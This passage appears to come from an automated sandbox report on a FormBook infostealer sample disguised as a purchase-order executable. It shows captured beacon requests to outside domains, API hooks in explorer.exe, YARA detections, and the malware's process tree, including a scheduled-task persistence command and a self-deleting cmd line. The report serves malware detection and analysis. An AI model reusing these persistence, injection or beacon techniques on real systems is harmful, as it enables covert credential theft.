                                                    Date: Tue, 23 Feb 2021 08:00:05 GMT
                                                    Connection: close
                                                    Content-Length: 243
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 32 34 36 38 33 35 2e 63 6f 6d 2f 6e 74 67 2f 3f 6f 6a 6f 68 7a 7a 3d 77 34 78 2b 68 61 75 68 6a 66 72 6f 6a 6d 70 39 34 63 31 6f 6e 70 6f 61 70 65 6e 7a 7a 70 74 78 74 72 7a 78 68 73 77 73 6e
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.246835.com/ntg/?ojohzz=w4x+hauhjfrojmp94c1onpoapenzzptxtrzxhswsn


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.44976723.229.197.10380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:00:26.050930977 CET6853OUTGET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1
                                                    Host: www.kaieteurny.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 23, 2021 09:00:26.258440971 CET6854INHTTP/1.1 500 Internal Server Error
                                                    Date: Tue, 23 Feb 2021 08:00:26 GMT
                                                    Server: Apache
                                                    Content-Length: 676
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6b 61 69 65 74 65 75 72 6e 79 2e 63 6c 69 71 75 65 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@kaieteurny.cliques.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: PO_210223.exe PID: 6976 Parent PID: 5920

                                                    General

                                                    Start time:08:58:25
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\PO_210223.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\PO_210223.exe'
                                                    Imagebase:0x890000
                                                    File size:802304 bytes
                                                    MD5 hash:E40AF9745E938B72D5D860BBC679AEBF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Analysis Process: schtasks.exe PID: 1556 Parent PID: 6976

                                                    General

                                                    Start time:08:58:39
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
                                                    Imagebase:0xb80000
                                                    File size:185856 bytes
                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 1744 Parent PID: 1556

                                                    General

                                                    Start time:08:58:39
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: PO_210223.exe PID: 1868 Parent PID: 6976

                                                    General

                                                    Start time:08:58:40
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\PO_210223.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\PO_210223.exe
                                                    Imagebase:0xc30000
                                                    File size:802304 bytes
                                                    MD5 hash:E40AF9745E938B72D5D860BBC679AEBF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 1868

                                                    General

                                                    Start time:08:58:42
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff6fee60000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: ipconfig.exe PID: 6744 Parent PID: 3424

                                                    General

                                                    Start time:08:58:56
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                    Imagebase:0xe50000
                                                    File size:29184 bytes
                                                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Analysis Process: cmd.exe PID: 7112 Parent PID: 6744

                                                    General

                                                    Start time:08:59:00
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\PO_210223.exe'
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 7092 Parent PID: 7112

                                                    General

                                                    Start time:08:59:01
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >